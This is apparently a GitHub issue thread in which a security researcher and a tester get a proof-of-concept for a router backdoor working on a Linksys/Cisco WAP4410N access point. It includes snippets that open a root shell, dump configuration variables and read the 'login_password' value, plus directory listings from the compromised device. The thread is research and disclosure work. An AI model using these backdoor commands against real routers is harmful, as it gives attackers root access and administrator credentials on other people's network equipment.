Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

WAP4410N #11

Closed
matthew1471 opened this Issue · 24 comments

4 participants

@matthew1471

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02
Software Version: 2.0.6.1

@elvanderb
Owner

strange... I'll investigate :)
Is there any error/message?

@matthew1471

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here : http://filebin.ca/17UJu55XztDv/Capture.pcapng

@elvanderb
Owner

no, thank you, I'll search the firmware.

@matthew1471

Okay thanks :-). Let me know if I can help.

@elvanderb
Owner

The binary in your firmware have all the symbols :) nice
I had a quick look on your version of scfgmgr and it seems to works like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell could you please test it on your router when it'll be up?

@matthew1471

Certainly will, thanks! Let me know when it's up.

@elvanderb
Owner

updated, could you test it and past the result?

@elvanderb
Owner

you can also try some commands like 'ps'

@matthew1471

backdoorolol.py

Traceback (most recent call last):
File "backdoorolol.py", line 41, in
print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1
]
File "backdoorolol.py", line 19, in send_message
assert(sig == 0x53634D4D)
AssertionError

@matthew1471

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

@elvanderb
Owner

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really bad coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)

@elvanderb
Owner

Could you test the last version please?

@matthew1471

Needed to bug fix to this line:
elif sig == 0X4D4D6353 :

However it now works! CONFIRMED!

Thank you very much for your time and patience :)

@elvanderb
Owner

Oh yes, my bad :)
you are welcome, thank you for your testing and report :)

@matthew1471

No, thank you :-)

Can you see from the firmware if there's a similar getvar function like with yours?

@elvanderb
Owner

you can use the command 1 to dump all the available variables, commands numbers are the same :)
command to use to dump all the vars:
send_message(s, endianness, 1) # dump all the variables

If I wasn't lazy I would code a real PoC with command line parameters :D

@matthew1471

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:
print send_message(s, endianness, 2, "login_password")[1]

The backdoor seems a bit unstable, if you try executing something it doesn't like it disconnects you and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me to connect until I rebooted the AP).

Here's the contents of /bin/

ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox

and the supported features of busybox:

busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs

@elvanderb
Owner

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

@matthew1471

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering but given our endian discovery, your list of "Backdoor is not working in", do these need to be re-checked with the new code?

@elvanderb
Owner

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just updated a new version that fix some bug

@elvanderb
Owner

woops, fixed :)

@elvanderb elvanderb closed this
@avsavchenko

Not works with new firmware 2.0.7.4

@an3k

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on it's own. It was just a "brand" name Cisco used for their SOHO products.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.